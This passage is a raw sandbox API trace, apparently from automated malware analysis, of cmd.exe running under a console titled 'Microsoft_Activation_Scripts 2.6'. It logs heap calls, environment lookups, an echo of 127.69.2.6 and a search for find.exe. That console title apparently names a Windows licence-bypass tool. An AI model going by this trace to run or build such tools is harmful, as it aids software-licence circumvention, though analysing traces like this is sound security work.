(_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0178.902] GetProcessHeap () returned 0x19a8f1e0000 [0178.903] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0210) returned 1 [0178.903] GetProcessHeap () returned 0x19a8f1e0000 [0178.903] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ec940 [0178.903] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.903] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"127.69.2.6\" \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe4c0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"127.69.2.6\" \"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe4a8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"127.69.2.6\" \"", lpProcessInformation=0x43f9efe4a8*(hProcess=0x98, hThread=0xac, dwProcessId=0xe4c, dwThreadId=0x1128)) returned 1 [0178.912] CloseHandle (hObject=0xac) returned 1 [0178.912] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.912] GetProcessHeap () returned 0x19a8f1e0000 [0178.913] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.913] GetEnvironmentStringsW () returned 0x19a8f206860* [0178.913] GetProcessHeap () returned 0x19a8f1e0000 [0178.913] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f2029e0 [0178.913] memcpy (in: _Dst=0x19a8f2029e0, _Src=0x19a8f206860, _Size=0xfbe | out: _Dst=0x19a8f2029e0) returned 0x19a8f2029e0 [0178.914] FreeEnvironmentStringsA (penv="=") returned 1 [0178.914] GetProcessHeap () returned 0x19a8f1e0000 [0178.914] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec940) returned 1 [0178.914] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe5a0 | out: lpAttributeList=0x43f9efe5a0) [0178.914] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.914] DuplicateHandle (in: hSourceProcessHandle=0x98, hSourceHandle=0x90, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0178.914] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0178.914] _close (_FileHandle=5) returned 0 [0178.914] _dup (_FileHandle=0) returned 4 [0178.914] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0178.914] _close (_FileHandle=3) returned 0 [0178.914] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0178.914] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0178.914] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0178.914] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0178.914] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0178.914] _wcsicmp (_String1="find", _String2="CD") returned 3 [0178.914] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0178.914] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0178.914] _wcsicmp (_String1="find", _String2="REN") returned -12 [0178.914] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0178.914] _wcsicmp (_String1="find", _String2="SET") returned -13 [0178.914] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0178.915] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0178.915] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0178.915] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0178.915] _wcsicmp (_String1="find", _String2="MD") returned -7 [0178.915] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0178.915] _wcsicmp (_String1="find", _String2="RD") returned -12 [0178.915] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0178.915] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0178.915] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0178.915] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0178.915] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0178.915] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0178.915] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0178.915] _wcsicmp (_String1="find", _String2="VER") returned -16 [0178.915] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0178.915] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0178.915] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0178.915] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0178.915] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0178.915] _wcsicmp (_String1="find", _String2="START") returned -13 [0178.915] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0178.915] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0178.915] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0178.915] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0178.915] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0178.915] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0178.915] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0178.915] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0178.915] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0178.915] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0178.915] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0178.915] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0178.916] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0178.916] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0178.916] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0178.916] _wcsicmp (_String1="find", _String2="CD") returned 3 [0178.916] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0178.916] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0178.916] _wcsicmp (_String1="find", _String2="REN") returned -12 [0178.916] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0178.916] _wcsicmp (_String1="find", _String2="SET") returned -13 [0178.916] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0178.916] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0178.916] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0178.916] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0178.916] _wcsicmp (_String1="find", _String2="MD") returned -7 [0178.916] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0178.916] _wcsicmp (_String1="find", _String2="RD") returned -12 [0178.916] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0178.916] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0178.916] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0178.916] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0178.916] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0178.916] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0178.916] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0178.916] _wcsicmp (_String1="find", _String2="VER") returned -16 [0178.916] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0178.916] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0178.916] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0178.916] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0178.916] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0178.916] _wcsicmp (_String1="find", _String2="START") returned -13 [0178.916] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0178.916] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0178.916] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0178.917] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0178.917] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0178.917] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0178.917] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0178.917] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0178.917] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0178.917] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0178.917] _wcsicmp (_String1="find", _String2="FOR") returned -6 [0178.917] _wcsicmp (_String1="find", _String2="IF") returned -3 [0178.917] _wcsicmp (_String1="find", _String2="REM") returned -12 [0178.917] GetProcessHeap () returned 0x19a8f1e0000 [0178.917] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f211da0 [0178.917] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0178.917] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0178.917] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0178.917] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0178.917] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0178.917] _wcsicmp (_String1="find", _String2="CD") returned 3 [0178.917] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0178.917] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0178.917] _wcsicmp (_String1="find", _String2="REN") returned -12 [0178.917] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0178.917] _wcsicmp (_String1="find", _String2="SET") returned -13 [0178.917] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0178.918] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0178.918] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0178.918] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0178.918] _wcsicmp (_String1="find", _String2="MD") returned -7 [0178.918] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0178.918] _wcsicmp (_String1="find", _String2="RD") returned -12 [0178.918] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0178.918] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0178.918] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0178.918] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0178.918] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0178.918] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0178.918] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0178.918] _wcsicmp (_String1="find", _String2="VER") returned -16 [0178.918] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0178.918] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0178.918] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0178.918] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0178.918] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0178.918] _wcsicmp (_String1="find", _String2="START") returned -13 [0178.918] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0178.918] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0178.918] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0178.918] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0178.918] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0178.918] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0178.918] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0178.918] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0178.918] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0178.918] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0178.919] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0178.919] GetProcessHeap () returned 0x19a8f1e0000 [0178.919] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f2010e0 [0178.919] SetErrorMode (uMode=0x0) returned 0x0 [0178.919] SetErrorMode (uMode=0x1) returned 0x0 [0178.919] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f2010f0, lpFilePart=0x43f9efe610 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe610*="System32") returned 0x13 [0178.919] SetErrorMode (uMode=0x0) returned 0x1 [0178.919] GetProcessHeap () returned 0x19a8f1e0000 [0178.919] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f2010e0, Size=0x42) returned 0x19a8f2010e0 [0178.919] GetProcessHeap () returned 0x19a8f1e0000 [0178.919] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f2010e0) returned 0x42 [0178.919] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0178.919] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.919] GetProcessHeap () returned 0x19a8f1e0000 [0178.919] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1faef0 [0178.919] GetProcessHeap () returned 0x19a8f1e0000 [0178.919] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1eabb0 [0178.919] GetProcessHeap () returned 0x19a8f1e0000 [0178.919] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xf0) returned 0x19a8f1eabb0 [0178.919] GetProcessHeap () returned 0x19a8f1e0000 [0178.919] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xf0 [0178.919] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0178.919] GetProcessHeap () returned 0x19a8f1e0000 [0178.919] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eacb0 [0178.919] GetProcessHeap () returned 0x19a8f1e0000 [0178.919] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eacb0, Size=0x88) returned 0x19a8f1eacb0 [0178.920] GetProcessHeap () returned 0x19a8f1e0000 [0178.920] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eacb0) returned 0x88 [0178.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe390) returned 0x19a8f1f86a0 [0178.920] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0178.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe390) returned 0xffffffffffffffff [0178.920] GetLastError () returned 0x2 [0178.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe390, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe390) returned 0x19a8f1f86a0 [0178.920] FindClose (in: hFindFile=0x19a8f1f86a0 | out: hFindFile=0x19a8f1f86a0) returned 1 [0178.920] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.921] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.921] GetProcessHeap () returned 0x19a8f1e0000 [0178.921] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1f0000 [0178.921] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.921] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.921] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.921] GetFileType (hFile=0x24) returned 0x2 [0178.921] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0178.921] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe648 | out: lpMode=0x43f9efe648) returned 1 [0178.922] _dup (_FileHandle=1) returned 3 [0178.922] _close (_FileHandle=1) returned 0 [0178.922] _wcsicmp (_String1="nul", _String2="con") returned 11 [0178.922] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x43f9efe5e0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0178.922] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0178.922] GetProcessHeap () returned 0x19a8f1e0000 [0178.922] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20c050 [0178.922] GetProcessHeap () returned 0x19a8f1e0000 [0178.922] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0cb0 [0178.922] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0178.922] GetProcessHeap () returned 0x19a8f1e0000 [0178.922] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f201140 [0178.923] SetErrorMode (uMode=0x0) returned 0x0 [0178.923] SetErrorMode (uMode=0x1) returned 0x0 [0178.923] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f201150, lpFilePart=0x43f9efe3a0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe3a0*="System32") returned 0x13 [0178.923] SetErrorMode (uMode=0x0) returned 0x1 [0178.923] GetProcessHeap () returned 0x19a8f1e0000 [0178.923] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f201140, Size=0x42) returned 0x19a8f201140 [0178.923] GetProcessHeap () returned 0x19a8f1e0000 [0178.923] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f201140) returned 0x42 [0178.923] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0178.923] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.923] GetProcessHeap () returned 0x19a8f1e0000 [0178.923] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1facf0 [0178.923] GetProcessHeap () returned 0x19a8f1e0000 [0178.923] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1f9f80 [0178.923] GetProcessHeap () returned 0x19a8f1e0000 [0178.923] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9f80, Size=0xf0) returned 0x19a8f1f9f80 [0178.923] GetProcessHeap () returned 0x19a8f1e0000 [0178.923] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9f80) returned 0xf0 [0178.923] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0178.923] GetProcessHeap () returned 0x19a8f1e0000 [0178.923] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1fa080 [0178.923] GetProcessHeap () returned 0x19a8f1e0000 [0178.923] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fa080, Size=0x88) returned 0x19a8f1fa080 [0178.923] GetProcessHeap () returned 0x19a8f1e0000 [0178.923] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fa080) returned 0x88 [0178.923] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.923] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe120) returned 0x19a8f1f8be0 [0178.924] FindClose (in: hFindFile=0x19a8f1f8be0 | out: hFindFile=0x19a8f1f8be0) returned 1 [0178.924] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe120) returned 0xffffffffffffffff [0178.924] GetLastError () returned 0x2 [0178.924] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe120) returned 0x19a8f1f8a60 [0178.924] FindClose (in: hFindFile=0x19a8f1f8a60 | out: hFindFile=0x19a8f1f8a60) returned 1 [0178.924] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.924] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.924] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe680, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0178.925] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe5a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe4a0 | out: lpAttributeList=0x43f9efe5a0, lpSize=0x43f9efe4a0) returned 1 [0178.925] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe5a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe48c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe5a0, lpPreviousValue=0x0) returned 1 [0178.925] GetStartupInfoW (in: lpStartupInfo=0x43f9efe530 | out: lpStartupInfo=0x43f9efe530*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0178.925] GetProcessHeap () returned 0x19a8f1e0000 [0178.925] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1efc10 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0178.925] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0178.926] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0178.927] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0178.927] 